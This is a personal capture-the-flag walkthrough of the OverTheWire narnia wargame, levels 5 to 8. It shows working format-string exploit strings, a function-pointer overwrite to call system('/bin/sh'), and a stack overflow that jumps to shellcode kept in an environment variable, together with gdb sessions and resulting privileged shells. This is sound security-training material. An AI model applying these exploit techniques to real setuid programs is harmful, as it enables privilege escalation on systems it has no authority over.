# Walkthrough

### narnia5

This is not a buffer overflow like the previous ones, so I needed to do some reading up on this.

I googled a bit and found this [article](https://crypto.stanford.edu/cs155old/cs155-spring08/papers/formatstring-1.2.pdf)[^1] that helped me to get on the right track.

I  also found this [walkthrough](http://cplusperks.com/narnia/#level5)[^2] that showed one way of performing the attack, but I didn't fully understand the solution. The walkthrough did link to a [blog post](http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html)[^3] that made the exploit clearer.

I started the exploit by trying to identify where my input would be placed, by increasing the number of "%p"s I found that the parameter 5 included my data:

``` sh
$ /games/narnia/narnia5 $(python  -c 'print("A"*4 + "%p"*5)')
Change i\'s value from 1 -> 500. No way...let me give you a hint!
buffer : [AAAA0xf7eb77460xffffffff0xffffd6ae0xf7e2fc340x41414141] (54)
i = 1 (0xffffd6cc)
```

I confirmed this by changing the "A" to "B" and the last four bytes in the buffer changed to 42424242

Great, now we know that it is the parameter 5 that needs to be addressed, see page 20 in the pdf[^1]. 

The value that will be written is the number of bytes specified in the string, the address is printed by the game during the run and changed unfrequently.  This gives us the string to print "memory address"+"extra length"+"parameter position"+"write command". 

To specify the extra length in the buffer, the %_n_x format can be used, as 
the  _n_ can be any integer and the number of bytes will be written, in this case its 500-memory length = 496. After length is given the parameter placement is specified, and its 5 as i worked out in the beginning. And finally the `$n` command is given to write at `%5`. 

Result:
``` sh
narnia5@melinda:~$ /games/narnia/narnia5 $(python  -c 'print("\xcc\xd6\xff\xff" + "%496x%5$n")')
Change i\'s value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
...
```
[^1]: `https://crypto.stanford.edu/cs155old/cs155-spring08/papers/formatstring-1.2.pdf`
[^2]: `http://cplusperks.com/narnia/#level5`
[^3]: `http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html`

### narnia6
This flag is a two buffer challenge. The environment is cleared so one cannot set external environment flags. 

The two buffers are 8 bytes each, but when I populate them with 8 bytes, I crash the program, interesting.

```
$ /games/narnia/narnia6 $(python -c 'print("A"*8 + " " + "B"*8)')
Segmentation fault
``` 
If I instead send 7 "A" to the buffer the program exits correctly, which indicates that the last byte overwrites the EBP. Sending in more "A" shows that the buffer just keeps writing them, and a buffer overflow should be available. 

``` sh
narnia6@melinda$ gdb -q /games/narnia/narnia6
Reading symbols from /games/narnia/narnia6...(no debugging symbols found)...done.
(gdb) r $(python -c 'print("A"*20 + " " + "B"*8)')
Starting program: /games/narnia/narnia6 $(python -c 'print("A"*20 + " " + "B"*8)')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/100x $esp
0xffffd66c:     0x080486b4      0xffffd690      0xffffd8a2      0x00000021
0xffffd67c:     0x08048712      0x00000003      0xffffd744      0x42424242
0xffffd68c:     0x42424242      0x41414100      0x41414141      0x41414141
0xffffd69c:     0x41414141      0x41414141      0xf7fca000      0x00000000
0xffffd6ac:     0xf7e3cad3      0x00000003      0xffffd744      0xffffd754

```
Investigating the stack shows us that the buffer "b2" is written directly before "b1", and will write over "b1" if overflown.

Lets see if we can get a NOP-slide going:

```
(gdb) r $(python -c 'print("\x90"*8 + "\x8c\xd6\xff\xff" + " " + "\x90"*8)')
Starting program: /games/narnia/narnia6 $(python -c 'print("\x90"*8 + "\x8c\xd6\xff\xff" + " " + "\x90"*8)')
[Inferior 1 (process 21965) exited with code 0377]
```
Each time I tried to call a memory-address from the NOP-slide, the program exited. This behavior is due to the code below, that performs a bitwise and-comparison and if the stackpointer points towards an address beginning with "ff" causes the program to exit.

``` c
if(((unsigned long)fp & 0xff000000) == get_sp())
                exit(-1);
```

This leads to two conclusions, 1) the stackpointer has been redirected and 2) we need to point to another address.

Three standard libraries are imported, which is of interest. One function that can be of interest is "system()" that is included in `stdlib.h` as it will execute a given string as a command. 

With this knowledge and that "b2" will overflow "b1", which then is interpreted by the program as the first argument, will let us execute "/bin/sh". 

To find which address system() is loaded in to, I used gdb: 
```
(gdb) b system
Breakpoint 1 at 0xf7e62e70
```
and to capture the flag:
``` sh
$ /games/narnia/narnia6 $(python -c 'print("\x90"*8 + "\x70\x2e\xe6\xf7" + " " + "\x90"*8 + "/bin/sh")')
$ whoami
narnia7
$ cat /etc/narnia_pass/narnia7
...
```



``` c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

}

int main(int argc, char *argv[]){
        char b1[8], b2[8];
        int  (*fp)(char *)=(int(*)(char *))&puts, i;

        if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

        /* clear environ */
        for(i=0; environ[i] != NULL; i++)
                memset(environ[i], '\0', strlen(environ[i]));
        /* clear argz    */
        for(i=3; argv[i] != NULL; i++)
                memset(argv[i], '\0', strlen(argv[i]));

        strcpy(b1,argv[1]);
        strcpy(b2,argv[2]);

        if(((unsigned long)fp & 0xff000000) == get_sp())
                exit(-1);
        fp(b1);

        exit(1);
}
```
### narnia7
This is also a string-format-exploit-flag like [narnia5](###narnia5). There are two main differences between the flags.

The first difference is that this program will not print information regarding which parameters you are manipulating. To find this out I used `ltrace`. `ltrace` also gives you some usefull information regarding the other data that you are going to manipulate to capture the flag. Note the 41s on the last row.

``` sh
narnia7@narnia:~$ ltrace /narnia/narnia7 $(python -c 'print("A"*4 + "%p"*6)')
__libc_start_main(0x804868f, 2, 0xffffd7c4, 0x8048740 <unfinished ...>
memset(0xffffd680, '\0', 128)                                         = 0xffffd680
printf("goodfunction() = %p\n", 0x80486e0goodfunction() = 0x80486e0
)                            = 27
printf("hackedfunction() = %p\n\n", 0x8048706hackedfunction() = 0x8048706

)                        = 30
printf("before : ptrf() = %p (%p)\n", 0x80486e0, 0xffffd67cbefore : ptrf() = 0x80486e0 (0xffffd67c)
)          = 41
puts("I guess you want to come to the "...I guess you want to come to the hackedfunction...
)                           = 50
sleep(2)                                                              = 0
snprintf("AAAA0x80482380xffffd6d80xf7ffda9"..., 128, "AAAA%p%p%p%p%p%p", 0x8048238, 0xffffd6d8, 0xf7ffda94, 0, 0x80486e0, 0x41414141) = 57

```

The other part that is different is that this time we are trying to write an integer that is larger that what we can store in two bytes. To be able to do that I used the method showed in the Grey Hat Hacker (Third edition) Table 12-2.

The solution to the flag is to overwrite the address of the goodfunction stored in the variable  _ptrf_, to the address of _hackedfunction()_. 

The program helps you along the way by printing the values of the different addresses, but you can also find them in the `ltrace`-output.

In other words; we want to write the value of 0x8048706(_hackedfunction()_) to the memory location 0xffffd66c(_ptrf_) by using the parameter nr 6. (In my case)

To do this we need to splice the value in to the high- and low-order bytes and then write the data to two different locations, 6 and 7. As it is needed to write to two different locations, two different memory addresses needs to be specified. The function pointer _ptrf_ points to 0xffffd66c which must be the start and the other memory address needs to be two bytes after it => 0xffffd66e. Using the algorithm given in the Grey Hat table, we get the nifty string to use and to get to the _hackedfunction()_ "\x6e\xd6\xff\xff\x6c\xd6\xff\xff%.2044x%6$hn%.32514x%7$hn"

I also wrote a python script that will produce this types of strings in /tools/memconv.py

``` sh
narnia7@narnia:~$ /narnia/narnia7 $(python -c 'print("\x6e\xd6\xff\xff\x6c\xd6\xff\xff%.2044x%6$hn%.32514x%7$hn")')

goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd66c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ whoami
narnia8
$
```
### narnia8

The following C-program is the challenge for this flag:
``` c
int i;

void func(char *b){
        char *blah=b;
        char bok[20];

        memset(bok, '\0', sizeof(bok));
        for(i=0; blah[i] != '\0'; i++)
                bok[i]=blah[i];

        printf("%s\n",bok);
}

int main(int argc, char **argv){

        if(argc > 1)
                func(argv[1]);
        else
        printf("%s argument\n", argv[0]);

        return 0;
}
``` 
The user supplies an argument to the program, the argument is passed on as the char-pointer `b` which then the pointer `blah` points to. `blah` is then copied char by char over to the 20 char large array `bok`. 

Things to notice in the source code is that this program does not clean the environment variables and when supplied with an argument of 20 bytes it prints some extra values.

Trying to just supply a too long argument does not help, but there are 22 chars printed instead of the expected 20. 

This seems to be a clue to the solution, time to dig in to `gdb` to see what is happening.

We are interested in the stack right before it is printed, so to find the right breakpoint, use disas:

```
(gdb) disas func
Dump of assembler code for function func:
   0x0804842d <+0>:     push   %ebp
   0x0804842e <+1>:     mov    %esp,%ebp
   0x08048430 <+3>:     sub    $0x38,%esp
   0x08048433 <+6>:     mov    0x8(%ebp),%eax
   0x08048436 <+9>:     mov    %eax,-0xc(%ebp)
   0x08048439 <+12>:    movl   $0x14,0x8(%esp)
   0x08048441 <+20>:    movl   $0x0,0x4(%esp)
   0x08048449 <+28>:    lea    -0x20(%ebp),%eax
   0x0804844c <+31>:    mov    %eax,(%esp)
   0x0804844f <+34>:    call   0x8048320 <memset@plt>
   0x08048454 <+39>:    movl   $0x0,0x80497b8
   0x0804845e <+49>:    jmp    0x8048486 <func+89>
   0x08048460 <+51>:    mov    0x80497b8,%eax
   0x08048465 <+56>:    mov    0x80497b8,%edx
   0x0804846b <+62>:    mov    %edx,%ecx
   0x0804846d <+64>:    mov    -0xc(%ebp),%edx
   0x08048470 <+67>:    add    %ecx,%edx
   0x08048472 <+69>:    movzbl (%edx),%edx
   0x08048475 <+72>:    mov    %dl,-0x20(%ebp,%eax,1)
   0x08048479 <+76>:    mov    0x80497b8,%eax
   0x0804847e <+81>:    add    $0x1,%eax
   0x08048481 <+84>:    mov    %eax,0x80497b8
   0x08048486 <+89>:    mov    0x80497b8,%eax
   0x0804848b <+94>:    mov    %eax,%edx
   0x0804848d <+96>:    mov    -0xc(%ebp),%eax
   0x08048490 <+99>:    add    %edx,%eax
   0x08048492 <+101>:   movzbl (%eax),%eax
   0x08048495 <+104>:   test   %al,%al
   0x08048497 <+106>:   jne    0x8048460 <func+51>
   0x08048499 <+108>:   lea    -0x20(%ebp),%eax
   0x0804849c <+111>:   mov    %eax,0x4(%esp)
   0x080484a0 <+115>:   movl   $0x8048580,(%esp)
   0x080484a7 <+122>:   call   0x80482f0 <printf@plt>
   0x080484ac <+127>:   leave
   0x080484ad <+128>:   ret
End of assembler dump.
```
so break at *func+122.


Taking a look at the stackpointer with 20 "A"s supplied:
```
(gdb) b *func+122
Breakpoint 1 at 0x80484a7
(gdb) r $(python -c 'print("A"*20)')
Starting program: /narnia/narnia8 $(python -c 'print("A"*20)')

Breakpoint 1, 0x080484a7 in func ()
(gdb) x/16wx $esp
0xffffd6c0:     0x08048580      0xffffd6d8      0x00000014      0xf7e55fe3
0xffffd6d0:     0x00000000      0x002c307d      0x41414141*     0x41414141  * start of bok
0xffffd6e0:     0x41414141      0x41414141      0x41414141**    0xffffd8e2  <-- address of blah
0xffffd6f0:     0x00000002      0xffffd7b4      0xffffd718      0x080484cd  ** end of bok input
```
And then with an attempted overflow of 4 "B"s:

```
(gdb) r $(python -c 'print("A"*20 + "B"*4)')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 $(python -c 'print("A"*20 + "B"*4)')

Breakpoint 2, 0x080484a7 in func ()
(gdb) x/160wx $esp
0xffffd6b0:     0x08048580      0xffffd6c8      0x00000014      0xf7e55fe3
0xffffd6c0:     0x00000000      0x002c307d    * 0x41414141      0x41414141  *start of bok
0xffffd6d0:     0x41414141      0x41414141      0x41414141      0xffffd842 <-- end of bok input
0xffffd6e0:     0x00000002      0xffffd7a4      0xffffd708      0x080484cd <-- return address
0xffffd6f0:     0xffffd8de<-    0xf7ffd000      0x080484fb      0xf7fcc000 -- address of blah
0xffffd700:     0x080484f0      0x00000000      0x00000000      0xf7e3cad3
[...]
0xffffd8c0:     0x00000000      0x00000000      0x00000000      0x6e2f0000
0xffffd8d0:     0x696e7261      0x616e2f61      0x61696e72      0x41410038 <-- start of blah
0xffffd8e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd8f0:     0x42424141 <-   0x53004242 <-   0x4c4c4548      0x69622f3d -- 4x42 in buffer
0xffffd900:     0x61622f6e      0x54006873      0x3d4d5245      0x65726373
0xffffd910:     0x322d6e65      0x6f633635      0x00726f6c      0x5f485353
0xffffd920:     0x45494c43      0x313d544e      0x312e3237      0x2e302e38
```
What we can see here is that `blah` does contain all 4 "B"s but only one was overwritten at the end of bok, though this corrupts the address.

By overwriting the end of `bok` with the address of `blah` we should be able to continue the overflow.

This will at first fail as the addresses are depending on the length of the input, note the different `blah`-address in the two examples above.

```
Starting program: /narnia/narnia8 $(python -c 'print("A"*20+"\xd2\xd8\xff\xff"+"B"*12)')

Breakpoint 1, 0x080484a7 in func ()
(gdb) x/160wx $esp
0xffffd6b0:     0x08048580      0xffffd6c8      0x00000014      0xf7e55fe3
0xffffd6c0:     0x00000000      0x002c307d      0x41414141      0x41414141
0xffffd6d0:     0x41414141      0x41414141      0x41414141      0xffffd8d2
0xffffd6e0:     0x42424242      0x42424242      0x42424242      0x080484cd
``` 
With the correct address given, the overflow is successful in the sense that it doesn't stop at the address of `blah`.

Now we know how to get the overflow to continue, time for the next step in the vuln exploit.

The base pointer `ebp` will point to the latest instruction in the stack, 4 bytes after the address to the next
instruction will be placed. This is the address space that we want to overwrite with our own.

As I noted in the beginning, the program do not clean the environmental variables, so I exported the shellcode from narnia1 to CODE.

`export CODE=$(./shell.py)`

`gdb` lest you find the addresses of the different environ-variables by: 

```
(gdb) x/s *((char**)environ+21)
0xffffdf7a:     "CODE=\270\320\264\221e\332\314\331t$\364]+\311\261\v1E\025\203\355\374\003E\021\342%\336\232=\\M\373\325s\021\212\301\343\372\377e\363l/\024\232\002\246;\016\063\260\273\256\303\356\331\307\255\337n\177\062w\302\366\323\272d"[]
``` 
To find other variables just inc or dec the "21".

Now when we have the address, we just have to include it in the argument given to narnia8. The change of length of the argument will once again change the address to `blah`. 

When I used the address of the environ-variable I did get a SIGSEGV, Segmentation fault and I needed to investigate.

I found that the shellcode started 5 bytes after the given address, as the first bytes are the variable name "EDOC="

The adjusted argument results in:
```
Starting program: /narnia/narnia8 $(python -c 'print("A"*20+"\x76\xd8\xff\xff"+"B"*12+"\x7f\xdf\xff\xff")')

Breakpoint 1, 0x080484a7 in func ()
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAvBBBBBBBBBBBBv
process 2598 is executing new program: /bin/dash
$
```
However, `gdb` doesn't launch the shell with heighten privileged so we need to be able to preform this outside of the debugger.

Just running the command does not result in a shell, just the same semi overflow that we saw in the beginning.

Taking a closer look in the file data with the help of xxd shows some information that looks like an address:
```
$ /narnia/narnia8 $(python -c 'print("A"*20)') | xxd
0000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0000010: 4141 4141 87d8 ffff 020a                 AAAA......
``` 

Comparing that to the information from gdb with 20 "A"s:
```
(gdb) x/20wx $esp
0xffffd650:     0x08048580      0xffffd668      0x00000014      0xf7e55fe3
0xffffd660:     0x00000000      0x002c307d      0x41414141      0x41414141
0xffffd670:     0x41414141      0x41414141      0x41414141      0xffffd88a
0xffffd680:     0x00000002      0xffffd744      0xffffd6a8      0x080484cd
0xffffd690:     0xffffd88a      0xf7ffd000      0x080484fb      0xf7fcc000
```
Rebuilding the address from the xxd-format to the same format `gdb` uses shows that the stack is place 3 places before:
```
  ffffd887
- ffffd88a
==========
        -3
``` 

Adjusting our memory addresses with minus three we should get shell, but no
``` 
AAAAAAAAAAAAAAAAAAAA]CCCCCCCCCCCC&]
Segmentation fault (core dumped)
```
Seems like the memory address for the enivron variable was changed outside of `gdb` more that just this offset. 

I modded my shellcode and prepended a NOP-slide at the beginning and then started probing for the correct memory address  manually, and was able to hit the NOP-slide at 0xffffdf40
